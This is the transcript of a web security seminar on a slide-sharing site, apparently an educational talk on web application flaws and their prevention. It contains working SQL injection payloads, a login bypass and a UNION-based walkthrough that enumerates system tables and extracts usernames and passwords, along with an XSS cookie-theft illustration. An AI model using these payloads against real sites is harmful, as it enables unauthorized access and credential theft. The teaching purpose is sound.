Presentation is loading. Please wait.

Presentation is loading. Please wait.

Web Security Seminar Simon Perry, Managing Director.

Similar presentations


Presentation on theme: "Web Security Seminar Simon Perry, Managing Director."— Presentation transcript:

1 Web Security Seminar Simon Perry, Managing Director

2 What are we going to do today?

3

4 The Tour!

5 …aspx?id=16

6 IDFirst NameLast NameEmailFilename 1JohnSmithjs@email.com1.rtf 2BillJonesbill@gmail.com2.doc 3JanePerryjane@hotmail.com3.doc 4JillKempjill@email.com4.pdf 5DaveSmithersdave@davesmithers.com 6BobJonesbob.jobs@gmail.com6.doc

7 Prevention …aspx?id=16&t=H6Q98BN

8 File Include Attacks /content.aspx?c=skinCare.html /content.aspx?c=babies.html

9

10 Prevention

11 Username: Password:

12 Username: username Password: ….. WHERE user = 'username' …

13 Username: user'name Password: ….. WHERE user = 'user'name' …

14 Username: myusername Password: mypassword GET THE USER WHERE username = 'myusername' AND password='mypassword'

15 Username: ' or 'a' = 'a Password: ' or 'a' = 'a GET THE USER WHERE username = '………' AND password='……….'

16 Username: ' or 'a' = 'a Password: ' or 'a' = 'a GET THE USER WHERE username = '' or 'a' = 'a' AND password='' or 'a' = 'a'

17 Username: admin Password: ' or username='admin

18 Username: admin Password: ' or username='admin GET THE USER WHERE username = 'admin' AND password='' or username = 'admin'

19 Prevention

20 …NewsList.aspx?cat=6

21 IDTitleIntro TextCategory 1IFOAM organic principlesOrganic principles………2 2Organic farmingOrganic farming prac……2 3A guide to organic food accreditation The word "organic" is one that ….. 3 4Labelling and packagingOrganic foods must meet EU…. 4 5Organic economicsUK food production has received…. 4 6Organic food - fact vs. fictionSurprisingly, there is opposition to the… 4

22 …NewsList.aspx?cat=6 SELECT * FROM tblNews WHERE category_id=6

23 SELECT * FROM tblNews WHERE category_id=

24 SELECT * FROM tblNews WHERE category_id=4 UNION ALL

25 IDTitleIntro Text 1IFOAM organic principles Organic principles……… 2Organic farmingOrganic farming prac…… 3A guide to organic food accreditation The word "organic" is one that ….. 4Labelling and packaging Organic foods must meet EU…. IDCategory NameDescription 1RedRed items 2BlackBlack items 3GreenGreen items 4BlueBlue items UNION ALL IDTitleIntro Text 1IFOAM organic principles Organic principles……… 2Organic farmingOrganic farming prac…… 3A guide to organic food accreditation The word "organic" is one that ….. 4Labelling and packaging Organic foods must meet EU…. 1RedRed items 2BlackBlack items 3GreenGreen items 4BlueBlue items

26 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL

27 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL IDTitleIntro TextCategory 1IFOAM organic principlesOrganic principles………2 2Organic farmingOrganic farming prac……2 3A guide to organic food accreditation The word "organic" is one that ….. 3 4Labelling and packagingOrganic foods must meet EU…. 4 5Organic economicsUK food production has received…. 4 6Organic food - fact vs. fictionSurprisingly, there is opposition to the… 4

28 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, NULL

29 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL

30 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, 'AAAA', NULL, NULL, NULL, NULL

31 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, 'AAAA', NULL, NULL, NULL, NULL

32 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects

33 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'

34 SELECT * FROM tblNews WHERE category_id=4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'

35 SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'

36 SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL, name + CAST(id AS nvarchar), NULL, NULL, NULL, NULL FROM sysobjects WHERE xType='u'

37 SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL, name, NULL, NULL, NULL, NULL FROM syscolumns WHERE id=357576312

38 SELECT * FROM tblNews WHERE category_id=-4 UNION ALL SELECT NULL,username + '-' + password,NULL,NULL,NULL,NULL FROM tblUsers

39 Prevention

40

41 File upload attacks

42 Prevention

43

44 XSS (Cross Site Scripting)

45 The Title Hello

46 Thank you […….].

47 alert("Hello");

48 Cookies Cache-Controlprivate Content-Length11308 Content-Typetext/html; charset=utf-8 ServerMicrosoft-IIS/7.0 X-AspNet-Version2.0.50727 Set-CookieASP.NET_SessionId=k3isz4qw4wl X-Powered-ByASP.NET DateWed, 19 Nov 2008 09:55:21 GMT Hostbadsecurity.corrine.xservers User-AgentMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.4) Accepttext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Languageen-gb,en;q=0.5 Accept-Encodinggzip,deflate Accept-CharsetISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive300 Connectionkeep-alive Refererhttp://badsecurity.corrine.xservers/ CookieASP.NET_SessionId=k3isz4qw4wl Web Server Client

49 XSS Attack Web Server Client

50 Cookie : ASP.NET_SessionId=k3isz4qw4wl XSS Attack Cookie : ASP.NET_SessionId=k3isz4qw4wl Web Server Client Bad Guy’s Web Server

51

52 Prevention

53 XSRF (Cross Site Request Forgery)

54

55 New Password: New Password (repeat):

56

57 Do you like eggs?

58 Do you like eggs?


59 Do you like eggs?

60 Do you like eggs?

61

62 Prevention

63

64

65

66

67 Why? Led by Design Training / Experience Price Driven Young Industry

68 Saniti se Input

69 Code Librar ies

70 Saniti se Input Code Librar ies Traini ng

71 Saniti se Input Code Librar ies Traini ng Testin g

72 Saniti se Input Code Librar ies Traini ng Testin g Process

73 be good

74 web application development web penetration testing


Download ppt "Web Security Seminar Simon Perry, Managing Director."

Similar presentations


Ads by Google